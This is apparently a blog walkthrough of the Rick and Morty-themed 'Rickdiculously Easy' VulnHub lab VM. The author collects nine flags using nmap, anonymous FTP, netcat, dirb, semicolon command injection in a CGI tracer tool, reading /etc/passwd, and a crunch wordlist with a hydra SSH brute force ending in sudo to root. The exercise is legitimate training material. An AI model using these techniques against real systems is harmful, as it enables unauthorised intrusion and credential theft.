This VM is based off the tv show Rick and Morty. I, myself, am a fan of this show so I had to check it out. It turned out to be quite easy but I still had fun solving it. Below is my walkthrough on capturing all of the flags.
We start out running a discovery scan and find our VM:
Currently scanning: Finished! | Screen View: Unique Hosts 3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180 _____________________________________________________________________________ IP At MAC Address Count Len MAC Vendor / Hostname ----------------------------------------------------------------------------- 192.168.56.1 0a:00:27:00:00:00 1 60 Unknown vendor 192.168.56.100 08:00:27:89:f9:13 1 60 PCS Systemtechnik GmbH 192.168.56.102 08:00:27:bf:52:95 1 60 PCS Systemtechnik GmbH
We find our target: 192.168.56.102. We then run an NMAP scan and notice the open ports and services:
eric@linux:~$ nmap 192.168.56.102 -p21,22,80,9090,13337,22222,60000 -sV Starting Nmap 7.60 ( https://nmap.org ) at 2017-10-05 08:08 CDT mass_dns: warning: Unable to open /etc/resolv.conf. Try using --system-dns or specify valid servers with --dns-servers mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers Nmap scan report for localhost.localdomain (192.168.56.102) Host is up (0.00044s latency). PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 22/tcp open tcpwrapped 80/tcp open http Apache httpd 2.4.27 ((Fedora)) 9090/tcp open http Cockpit web service 13337/tcp open tcpwrapped 22222/tcp open ssh OpenSSH 7.5 (protocol 2.0) 60000/tcp open tcpwrapped Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 36.43 seconds eric@linux:~$
We begin with the low hanging fruit and capture a few flags.
We notice with the ftp service that anonymous login is enabled. Upon logging in, we see the flag. We pull it down via GET and cat the contents:
eric@linux:~$ ftp 192.168.56.102 Connected to 192.168.56.102. 220 (vsFTPd 3.0.3) Name (192.168.56.102:eric): anonymous 331 Please specify the password. Password: 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp> ls 200 PORT command successful. Consider using PASV. 150 Here comes the directory listing. -rw-r--r-- 1 0 0 42 Aug 22 05:10 FLAG.txt drwxr-xr-x 2 0 0 6 Feb 12 2017 pub 226 Directory send OK. ftp> get FLAG.txt local: FLAG.txt remote: FLAG.txt 200 PORT command successful. Consider using PASV. 150 Opening BINARY mode data connection for FLAG.txt (42 bytes). 226 Transfer complete. 42 bytes received in 0.00 secs (15.4484 kB/s) ftp> quit 221 Goodbye. eric@linux:~$ cat FLAG.txt FLAG{Whoa this is unexpected} - 10 Points eric@linux:~$
Flag 1 is found. 10/130 points total:
FLAG{Whoa this is unexpected} - 10 Points
We then connect to port 60000 and notice it is "Ricks half baked reverse shell...". When connected, we are allowed to run minimal commands. However, running ls and cat allows us to see the flag and view the contents:
eric@linux:~$ nc -nv 192.168.56.102 60000 (UNKNOWN) [192.168.56.102] 60000 (?) open Welcome to Ricks half baked reverse shell... # ls FLAG.txt # cat FLAG.txt FLAG{Flip the pickle Morty!} - 10 Points # quit quit: command not found # ^C eric@linux:~$
Flag 2 is found. 20/130 points total:
FLAG{Whoa this is unexpected} - 10 Points FLAG{Flip the pickle Morty!} - 10 Points
Next we move to port 13337. When connected, we are quickly prompted with the next flag.
eric@linux:~$ nc -nv 192.168.56.102 13337 (UNKNOWN) [192.168.56.102] 13337 (?) open FLAG:{TheyFoundMyBackDoorMorty}-10Points eric@linux:~$
Flag 3 is found. 30/130 points total:
FLAG{Whoa this is unexpected} - 10 Points FLAG{Flip the pickle Morty!} - 10 Points FLAG:{TheyFoundMyBackDoorMorty}-10Points
Next, we check out port 9090. Upon navigating to the page, we see our next flag:
Flag 4 is found. 40/130 points total.
FLAG{Whoa this is unexpected} - 10 Points FLAG{Flip the pickle Morty!} - 10 Points FLAG:{TheyFoundMyBackDoorMorty}-10Points FLAG {There is no Zeus, in your face!} - 10 Points
We then move our way to port 80. We run DIRB against this and encounter a few directories that seem interesting:
eric@linux:~$ dirb http://192.168.56.102 ----------------- DIRB v2.22 By The Dark Raver ----------------- START_TIME: Thu Oct 5 08:25:56 2017 URL_BASE: http://192.168.56.102/ WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt ----------------- GENERATED WORDS: 4612 ---- Scanning URL: http://192.168.56.102/ ---- + http://192.168.56.102/cgi-bin/ (CODE:403|SIZE:217) + http://192.168.56.102/index.html (CODE:200|SIZE:326) ==> DIRECTORY: http://192.168.56.102/passwords/ + http://192.168.56.102/robots.txt (CODE:200|SIZE:126) ---- Entering directory: http://192.168.56.102/passwords/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ----------------- END_TIME: Thu Oct 5 08:25:58 2017 DOWNLOADED: 4612 - FOUND: 3 eric@linux:~$
Specifically, /cgi-bin/, /passwords/ and /robots.txt seem interesting. We begin with the /passwords/ directory. We notice a FLAG.txt inside.
Flag 5 is found. 50/130 total points.
FLAG{Whoa this is unexpected} - 10 Points FLAG{Flip the pickle Morty!} - 10 Points FLAG:{TheyFoundMyBackDoorMorty}-10Points FLAG {There is no Zeus, in your face!} - 10 Points FLAG{Yeah d- just don't do it.} - 10 Points
Next, if we go back to the /passwords/ directory and view the source of passwords.html, we notice a comment that says <!--Password: winter-->. We keep this in our pocket for later enumeration.
We then check out the /robots.txt directory and see 2 scripts within the /cgi-bin/ directory: root_shell.cgi and tracertool.cgi
Accessing /cgi-bin/tracertool.cgi, we see Morty's Machine Tracer Machine:
Upon enumeration, we notice that if we use a semi colon ";" we can then perform command execution. To prove, I run id, whoami, pwd and a few other simple commands:
And the response is as expected:
I was unsuccessful in gaining a shell with this RCE. I did notice that "cat" was not allowed. However, when running "more" against "/etc/passwd", I noticed that "Summer" was an active user:
Output below:
Remembering earlier about a password that was found "winter", I decided to try and SSH to port 22222 as Summer and the password "winter":
eric@linux:~$ ssh Summer@192.168.56.102 -p 22222 Summer@192.168.56.102's password: Last login: Wed Oct 4 15:31:17 2017 [Summer@localhost ~]$ whoami Summer [Summer@localhost ~]$
Success. Now that I have remote access, I did some enumeration. I found inside Summer's home directory another flag:
[Summer@localhost ~]$ pwd /home/Summer [Summer@localhost ~]$ more FLAG.txt FLAG{Get off the high road Summer!} - 10 Points [Summer@localhost ~]$
Flag 6 found. 60/130 total points.
FLAG{Whoa this is unexpected} - 10 Points FLAG{Flip the pickle Morty!} - 10 Points FLAG:{TheyFoundMyBackDoorMorty}-10Points FLAG {There is no Zeus, in your face!} - 10 Points FLAG{Yeah d- just don't do it.} - 10 Points FLAG{Get off the high road Summer!} - 10 Points
I did further enumeration and found 2 files located in Morty's home directory. I copied them over to Summer's directory and then SCP'd them to my local host:
[Summer@localhost ~]$ ls ../Morty/ journal.txt.zip Safe_Password.jpg [Summer@localhost ~]$ cp ../Morty/journal.txt.zip ~ [Summer@localhost ~]$ cp ../Morty/Safe_Password.jpg ~ [Summer@localhost ~]$ ^C [Summer@localhost ~]$ exit logout Connection to 192.168.56.102 closed. eric@linux:~$ scp -P 22222 Summer@192.168.56.102:journal.txt.zip ~ Summer@192.168.56.102's password: journal.txt.zip 100% 414 483.9KB/s 00:00 eric@linux:~$ scp -P 22222 Summer@192.168.56.102:Safe_Password.jpg ~ Summer@192.168.56.102's password: Safe_Password.jpg 100% 42KB 17.5MB/s 00:00 eric@linux:~$ ls burp-hash.sqlite Documents FLAG.txt Music Public Templates vulnhub-rickdiculous Desktop Downloads journal.txt.zip Pictures Safe_Password.jpg Videos eric@linux:~$
With both files saved locally, I noticed that the journal.txt.zip file was password protected. I tried viewing the jpg and it was just a picture of Rick. I then ran strings against the file and found the password:
I then tried the password "Meeseek" on the zip file and it successfully opened it. Looking at the contents was a message and another flag:
eric@linux:~$ unzip journal.txt.zip Archive: journal.txt.zip [journal.txt.zip] journal.txt password: inflating: journal.txt eric@linux:~$ cat journal.txt Monday: So today Rick told me huge secret. He had finished his flask and was on to commercial grade paint solvent. He spluttered something about a safe, and a password. Or maybe it was a safe password... Was a password that was safe? Or a password to a safe? Or a safe password to a safe? Anyway. Here it is: FLAG: {131333} - 20 Points eric@linux:~$
Flag 7 found. 80/130 total points only 50 to go!
FLAG{Whoa this is unexpected} - 10 Points FLAG{Flip the pickle Morty!} - 10 Points FLAG:{TheyFoundMyBackDoorMorty}-10Points FLAG {There is no Zeus, in your face!} - 10 Points FLAG{Yeah d- just don't do it.} - 10 Points FLAG{Get off the high road Summer!} - 10 Points FLAG: {131333} - 20 Points
With the above information about Rick getting drunk and talking about a safe to a password, the FLAG contains "131333". I also noticed inside Rick's home directory appeared to be a directory to RICKS_SAFE. Inside this directory was an executable called "safe". So, I copied this "safe" to Summer's home directory and SCP'd it locally. I then ran the executable with the password "131333" and successfully opened the safe:
[Summer@localhost ~]$ ls ../RickSanchez/ RICKS_SAFE ThisDoesntContainAnyFlags [Summer@localhost ~]$ ls ../RickSanchez/RICKS_SAFE/ safe [Summer@localhost ~]$ cp ../RickSanchez/RICKS_SAFE/safe ~ [Summer@localhost ~]$ exit logout Connection to 192.168.56.102 closed. eric@linux:~$ scp -P 22222 Summer@192.168.56.102:safe ~ Summer@192.168.56.102's password: safe 100% 8704 6.1MB/s 00:00 eric@linux:~$ ./safe 131333 decrypt: FLAG{And Awwwaaaaayyyy we Go!} - 20 Points Ricks password hints: (This is incase I forget.. I just hope I don't forget how to write a script to generate potential passwords. Also, sudo is wheely good.) Follow these clues, in order 1 uppercase character 1 digit One of the words in my old bands name.� @ eric@linux:~$
Flag 8 found. 100/130 total points:
FLAG{Whoa this is unexpected} - 10 Points FLAG{Flip the pickle Morty!} - 10 Points FLAG:{TheyFoundMyBackDoorMorty}-10Points FLAG {There is no Zeus, in your face!} - 10 Points FLAG{Yeah d- just don't do it.} - 10 Points FLAG{Get off the high road Summer!} - 10 Points FLAG: {131333} - 20 Points FLAG{And Awwwaaaaayyyy we Go!} - 20 Points
We then read the contents of Rick's safe and it suggests that incase he forgets his password, it is in the following syntax: 1 uppercase character, 1 digit and one of the words in his old bands name. He also mentions that "sudo is wheely good".
Knowing that Rick Sanchez's old bands name is "The Flesh Curtains" with Birdperson and Squanchy, I decide to use "crunch" to generate a password list with 1 upper case character, 1 digit and either ending in "Flesh" or "Curtains".
eric@linux:~$ crunch 10 10 -t ,%Curtains -o ./wordlist.curtains Crunch will now generate the following amount of data: 2860 bytes 0 MB 0 GB 0 TB 0 PB Crunch will now generate the following number of lines: 260 crunch: 100% completed generating output eric@linux:~$ crunch 7 7 -t ,%Flesh -o ./wordlist.flesh Crunch will now generate the following amount of data: 2080 bytes 0 MB 0 GB 0 TB 0 PB Crunch will now generate the following number of lines: 260 crunch: 100% completed generating output eric@linux:~$ cat wordlist.curtains > wordlist eric@linux:~$ cat wordlist.flesh >> wordlist eric@linux:~$ wc -l wordlist 520 wordlist eric@linux:~$
With my password list generated, I then use Hydra to brute force my way as RickSanchez via SSH and found the correct password:
eric@linux:~$ hydra -l RickSanchez -P wordlist ssh://192.168.56.102 -s 22222 Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. Hydra (http://www.thc.org/thc-hydra) starting at 2017-10-05 09:19:08 [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4 [DATA] max 16 tasks per 1 server, overall 16 tasks, 520 login tries (l:1/p:520), ~33 tries per task [DATA] attacking ssh://192.168.56.102:22222/ [22222][ssh] host: 192.168.56.102 login: RickSanchez password: P7Curtains 1 of 1 target successfully completed, 1 valid password found [WARNING] Writing restore file because 5 final worker threads did not complete until end. [ERROR] 5 targets did not resolve or could not be connected [ERROR] 16 targets did not complete Hydra (http://www.thc.org/thc-hydra) finished at 2017-10-05 09:19:39 eric@linux:~$
With the correct password found: P7Curtains, I SSH successfully into the box as Rick. I then sudo to root per Rick's instructions and I extract the contents of the final flag:
eric@linux:~$ ssh RickSanchez@192.168.56.102 -p 22222 RickSanchez@192.168.56.102's password: Last failed login: Fri Oct 6 01:19:39 AEDT 2017 from 192.168.56.101 on ssh:notty There were 176 failed login attempts since the last successful login. Last login: Wed Oct 4 15:46:42 2017 [RickSanchez@localhost ~]$ sudo -i [sudo] password for RickSanchez: [root@localhost ~]# more FLAG.txt FLAG: {Ionic Defibrillator} - 30 points [root@localhost ~]#
Flag 9 found. 130/130 total points:
FLAG{Whoa this is unexpected} - 10 Points FLAG{Flip the pickle Morty!} - 10 Points FLAG:{TheyFoundMyBackDoorMorty}-10Points FLAG {There is no Zeus, in your face!} - 10 Points FLAG{Yeah d- just don't do it.} - 10 Points FLAG{Get off the high road Summer!} - 10 Points FLAG: {131333} - 20 Points FLAG{And Awwwaaaaayyyy we Go!} - 20 Points FLAG: {Ionic Defibrillator} - 30 points
This was a simple VM but I still had fun working on it. I enjoy the themes that were provided, especially Rick and Morty. I feel this VM provides a great introduction to pen testing and using a few common hacking tools to better enumerate and accomplish certain tasks.
Thanks to Luke for making a fun VM and vulnhub for hosting these great VM's.
Until next time!
geoda